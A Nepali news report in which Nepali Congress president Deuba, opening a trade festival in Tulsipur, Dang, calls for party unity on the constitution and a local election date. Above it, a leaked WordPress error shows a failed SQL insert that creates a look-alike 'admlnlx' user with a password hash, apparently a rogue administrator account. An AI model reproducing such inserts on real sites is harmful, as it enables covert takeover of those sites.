WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUiLniehVJBVsxuADiWgFVYYkGDWS00', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:23:53', '', 'admlnlx', 'admlnlx')
दाङ, माघ १३–
नेपाली काँग्रेसका सभापति शेरबहादुर देउवाले संविधान जारी गर्दा मिलेका दलहरु संविधान कार्यान्यन गर्न पनि एक हुनुपर्ने बताउनुभएको छ ।
तुलसीपुर उद्योग वाणिज्य सङ्घले आजदेखि सञ्चालन गरेको मध्यपश्चिम व्यापारिक महोत्सवको उद्घाटन गर्दै उहाँले भन्नुभयो, “जसरी सबै दल मिलेर संविधान जारी गरेका थियौँ, त्यसैगरी कार्यान्वयनमा पनि एक हुन अतिआवश्यक छ ।”
सभापति देउवाले हाल देखिएको विवाद मिलाएर स्थानीय तह चुनावको घोषणा हुने बताउनुभयो । उहाँले भन्नुभयो, “प्राप्त उपलब्धि रक्षाका लागि दलहरु एक ठाउँमा आउनुको विकल्प छैन, तपाईँहरु ढुक्क हुनुहोस्, हामीहरुले चुनाव गराएरै छाड्छौँ ।” अबको एक सातापछि स्थानीय निर्वाचनको मिति घोषणा हुने उहाँको भनाइ थियो ।
उहाँले दाङको विमानस्थलको स्तरवृद्धिका साथै विमानस्थलमा इन्धन डिपो निर्माणका लागि आफूले पहल गर्ने आश्वासन पनि दिनुभयो ।